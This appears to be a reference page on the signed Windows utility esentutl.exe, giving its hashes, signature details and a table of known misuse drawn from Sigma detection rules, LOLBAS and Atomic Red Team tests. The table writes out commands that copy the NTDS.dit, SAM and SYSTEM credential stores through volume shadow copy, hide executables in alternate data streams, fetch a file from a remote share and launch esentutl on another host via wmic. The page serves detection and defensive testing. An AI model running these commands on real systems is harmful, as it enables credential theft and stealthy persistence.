esentutl.exe
- File Path:
C:\Windows\system32\esentutl.exe - Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Hashes
| Type | Hash |
|---|---|
| MD5 | D4CD32ECE6D3DC2F2B32A45F828078DE |
| SHA1 | 3FCF5E1BEB126A3EF8E0C1C2DAEBA18DB3554A98 |
| SHA256 | 6363FBBDB2E8AA68E11D12CF20EE008A86517D93BA155B1A32B5DC9A7AF61876 |
| SHA384 | AEAF14AC9AF593695E901839D8C500F2D7FF232674C2618B774B886693493293675C50D7039B5CDEC7334F6082CE8115 |
| SHA512 | 8F5EC082873369D4C9CD46F63676EFACDB2A0C720A9E542986003E4F8179DD673BD04F02E52F964ED64A8C7E99374FAC582B314690D934DFAA1588845A07AD9C |
| SSDEEP | 6144:Y4BpxWW2iWcKTBxdw8zbYsqplR2JduRFWG0KI3RVY2:xnxWW29FwMbyplR2dumG07hV |
Runtime Data
Child Processes:
conhost.exe
Signature
- Status: Signature verified.
- Serial:
3300000266BD1580EFA75CD6D3000000000266 - Thumbprint:
A4341B9FD50FB9964283220A36A1EF6F6FAA7840 - Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: esentutl.exe
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.14393.2999 (rs1_release_inmarket.190520-1518)
- Product Version: 10.0.14393.2999
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | sysmon_suspicious_remote_thread.yml | - '\esentutl.exe' |
DRL 1.0 |
| sigma | win_susp_esentutl_activity.yml | title: Suspicious Esentutl Use |
DRL 1.0 |
| sigma | win_susp_esentutl_activity.yml | description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. |
DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ |
DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - esentutl.exe /y /vss *\ntds.dit* |
DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - esentutl.exe /y /vss *\SAM |
DRL 1.0 |
| sigma | win_susp_vssadmin_ntds_activity.yml | - esentutl.exe /y /vss *\SYSTEM |
DRL 1.0 |
| sigma | proc_creation_win_alternate_data_streams.yml | - 'esentutl ' |
DRL 1.0 |
| sigma | proc_creation_win_copying_sensitive_files_with_credential_data.yml | - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ |
DRL 1.0 |
| sigma | proc_creation_win_copying_sensitive_files_with_credential_data.yml | - Image\|endswith: '\esentutl.exe' |
DRL 1.0 |
| sigma | proc_creation_win_esentutl_webcache.yml | title: Esentutl Steals Browser Information |
DRL 1.0 |
| sigma | proc_creation_win_esentutl_webcache.yml | description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe |
DRL 1.0 |
| sigma | proc_creation_win_esentutl_webcache.yml | Image\|endswith: \esentutl.exe |
DRL 1.0 |
| sigma | proc_creation_win_susp_esentutl_params.yml | title: Esentutl Gather Credentials |
DRL 1.0 |
| sigma | proc_creation_win_susp_esentutl_params.yml | description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. |
DRL 1.0 |
| sigma | proc_creation_win_susp_esentutl_params.yml | - 'esentutl' |
DRL 1.0 |
| sigma | registry_event_esentutl_volume_shadow_copy_service_keys.yml | title: Esentutl Volume Shadow Copy Service Keys |
DRL 1.0 |
| sigma | registry_event_esentutl_volume_shadow_copy_service_keys.yml | description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. |
DRL 1.0 |
| sigma | registry_event_esentutl_volume_shadow_copy_service_keys.yml | Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter |
DRL 1.0 |
| LOLBAS | Esentutl.yml | Name: Esentutl.exe |
|
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o |
|
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o |
|
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o |
|
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o |
|
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o |
|
| LOLBAS | Esentutl.yml | - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit |
|
| LOLBAS | Esentutl.yml | - Path: C:\Windows\System32\esentutl.exe |
|
| LOLBAS | Esentutl.yml | - Path: C:\Windows\SysWOW64\esentutl.exe |
|
| LOLBAS | Esentutl.yml | - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ |
|
| atomic-red-team | index.md | - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: esentutl.exe SAM copy [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: esentutl.exe SAM copy [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | - Atomic Test #3 - esentutl.exe SAM copy | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | ## Atomic Test #3 - esentutl.exe SAM copy | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | Copy the SAM hive using the esentutl.exe utility | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.002.md | esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.003.md | wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o | MIT License. © 2018 Red Canary |
MIT License. Copyright (c) 2020-2021 Strontic.